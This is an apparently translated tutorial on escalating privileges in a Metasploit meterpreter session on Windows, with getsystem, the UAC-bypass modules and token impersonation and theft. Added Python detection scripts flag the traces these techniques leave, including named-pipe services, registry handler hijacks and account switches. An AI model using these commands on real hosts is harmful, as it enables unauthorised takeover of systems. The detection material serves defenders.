A word before we start: there are many ways to escalate privileges. This post covers one situation only, where you already have a low-privilege user session in MSF and want to escalate with MSF itself. Read carefully, little brother!!!
1. Run the privilege-escalation command directly
meterpreter > getsystem
2. Escalate with MSF's built-in bypassuac modules
MSF ships several bypassuac modules. They rely on different techniques but are used the same way: run the module, and once it returns a new session, run getsystem again in that session to get SYSTEM.
search bypassuac

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   1  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   2  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   3  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   8  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
You can also use MSF's enum_patches module to collect the installed-patch information, then look for an exploit that fits.
Pick the MSF module yourself according to which patches are absent and the vulnerability each absent patch corresponds to.
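From the defender's side, sections 1 and 2 each leave a recognisable trace on the host: getsystem's named-pipe technique installs a short-lived service whose command echoes into a pipe, the fodhelper and eventvwr bypasses write a per-user shell handler key (ms-settings and mscfile respectively), and the chain ends with an auto-elevating binary spawning a shell. The script below is an added detection example, not code from the original post or from Metasploit. The events are constructed, with field names modelled on Windows System event 7045 and Sysmon events 13 and 1; the expected-children allowlist is an assumption to tune per environment.

```python
import re

# Constructed sample events (not real telemetry). Field names are modelled on
# Windows System event 7045 (service installed), Sysmon event 13 (registry
# value set) and Sysmon event 1 (process create).
SAMPLE_EVENTS = [
    # getsystem technique 1 installs a throwaway service whose command echoes
    # into a named pipe so the attacker's process can impersonate the client.
    {"id": 7045, "ServiceName": "xtqRmgnZ",
     "ImagePath": r"cmd.exe /c echo xtqRmgnZ > \\.\pipe\xtqRmgnZ"},
    {"id": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe"},
    # fodhelper / eventvwr style bypasses plant a handler under the user's hive.
    {"id": 13, "Image": r"C:\Users\testpig\AppData\Local\Temp\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\Users\testpig\AppData\Local\Temp\update.exe"},
    {"id": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Classes\.txt\(Default)",
     "Details": "txtfile"},
    # An auto-elevating binary spawning a shell is the tell-tale end of the chain.
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High"},
    {"id": 1, "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe", "IntegrityLevel": "High"},
]

# Service binary path of the form "... echo <x> > \\.\pipe\<x>".
PIPE_ECHO_SERVICE = re.compile(r"echo\s+\S+\s*>\s*\\\\\.\\pipe\\", re.IGNORECASE)

# Per-user shell handler keys that the fodhelper (ms-settings) and eventvwr
# (mscfile) techniques are publicly documented to write; matched case-insensitively.
HIJACKED_HANDLER_KEYS = (
    r"\software\classes\ms-settings\shell\open\command",
    r"\software\classes\mscfile\shell\open\command",
)

# Auto-elevating parents and the children they legitimately spawn. This
# allowlist is an assumption for the example; tune it to your environment.
AUTOELEVATE_EXPECTED_CHILDREN = {
    "fodhelper.exe": set(),
    "eventvwr.exe": {"mmc.exe"},
}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (index, rule_name) pairs for every event that matches a rule."""
    findings = []
    for idx, ev in enumerate(events):
        if ev["id"] == 7045 and PIPE_ECHO_SERVICE.search(ev["ImagePath"]):
            findings.append((idx, "getsystem_pipe_service"))
        elif ev["id"] == 13:
            target = ev["TargetObject"].lower()
            if any(key in target for key in HIJACKED_HANDLER_KEYS):
                findings.append((idx, "uac_handler_key_hijack"))
        elif ev["id"] == 1:
            parent = _basename(ev["ParentImage"])
            expected = AUTOELEVATE_EXPECTED_CHILDREN.get(parent)
            if expected is not None and _basename(ev["Image"]) not in expected:
                findings.append((idx, "autoelevate_unexpected_child"))
    return findings


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx]}")
```

The three rules fire on events 0, 2 and 4 and stay quiet on the benign look-alikes (a real service install, an ordinary file-association write, and eventvwr.exe starting mmc.exe). Writes to the handler keys are worth alerting on regardless of outcome, since nothing legitimate normally creates them under a user's hive.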
3. Token manipulation
Impersonating a token with incognito
use incognito                      # help incognito shows the help
list_tokens -u                     # list the tokens available to you
impersonate_token PIG\\testpig     # impersonate testpig's token; the same as impersonate_token 'PIG\testpig', but without single quotes you must escape the backslash as \\
execute -f cmd.exe -i -t           # -t runs cmd.exe under the impersonated token; you can also just type shell to get a terminal under the current token
rev2self                           # revert to your original token
Stealing a token with steal_token
steal_token <pid>                  # steal the token from the given process; run ps first to list process details
drop_token                         # discard the stolen token
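The commands in section 3 all end the same way on the endpoint: a process started by the attacker's low-privilege process runs under a different account (testpig here, or SYSTEM if the stolen token came from a SYSTEM process). The script below is an added detection example, not code from the original post, that joins constructed Sysmon event 1 style records on ProcessId/ParentProcessId and flags account changes between parent and child. The launcher allowlist is an assumption to tune per environment.

```python
# Constructed Sysmon event 1 style records (not real telemetry). Each record
# carries the account the new process runs as; the parent's account is
# recovered by joining on ProcessId / ParentProcessId.
PROCESS_EVENTS = [
    {"ProcessId": 700, "ParentProcessId": 500,
     "Image": r"C:\Windows\System32\services.exe", "User": r"NT AUTHORITY\SYSTEM"},
    # services.exe starting a service under another account is normal.
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"ProcessId": 3100, "ParentProcessId": 2900,
     "Image": r"C:\Windows\explorer.exe", "User": r"PIG\lowpriv"},
    {"ProcessId": 5200, "ParentProcessId": 3100,
     "Image": r"C:\Users\lowpriv\update.exe", "User": r"PIG\lowpriv"},
    # cmd.exe started by the lowpriv process but running as another account:
    # the shape of execute -f cmd.exe -t after impersonate_token or steal_token.
    {"ProcessId": 5300, "ParentProcessId": 5200,
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"PIG\testpig"},
    {"ProcessId": 5400, "ParentProcessId": 5200,
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"PIG\lowpriv"},
]

# Parents that legitimately start children under a different account. This
# allowlist is an assumption for the example; tune it for your environment.
LEGIT_ACCOUNT_SWITCHERS = {"services.exe", "wininit.exe", "winlogon.exe", "userinit.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_account_switches(events):
    """Return children whose account differs from their parent's, excluding
    parents that are expected to switch accounts. Parents with no record
    (for example, started before logging began) are skipped, not guessed at."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    findings = []
    for child in events:
        parent = by_pid.get(child["ParentProcessId"])
        if parent is None:
            continue
        if parent["User"].lower() == child["User"].lower():
            continue
        if _basename(parent["Image"]) in LEGIT_ACCOUNT_SWITCHERS:
            continue
        findings.append({
            "ProcessId": child["ProcessId"],
            "Image": child["Image"],
            "ChildUser": child["User"],
            "ParentImage": parent["Image"],
            "ParentUser": parent["User"],
        })
    return findings


if __name__ == "__main__":
    for hit in find_account_switches(PROCESS_EVENTS):
        print(f"pid {hit['ProcessId']} {hit['Image']} runs as {hit['ChildUser']} "
              f"but parent {hit['ParentImage']} runs as {hit['ParentUser']}")
```

Only pid 5300 is reported: the svchost.exe under NETWORK SERVICE is excused by its services.exe parent, and the second cmd.exe keeps its parent's account. On real data, join on Sysmon's ProcessGuid/ParentProcessGuid rather than the numeric pids, since pids are reused.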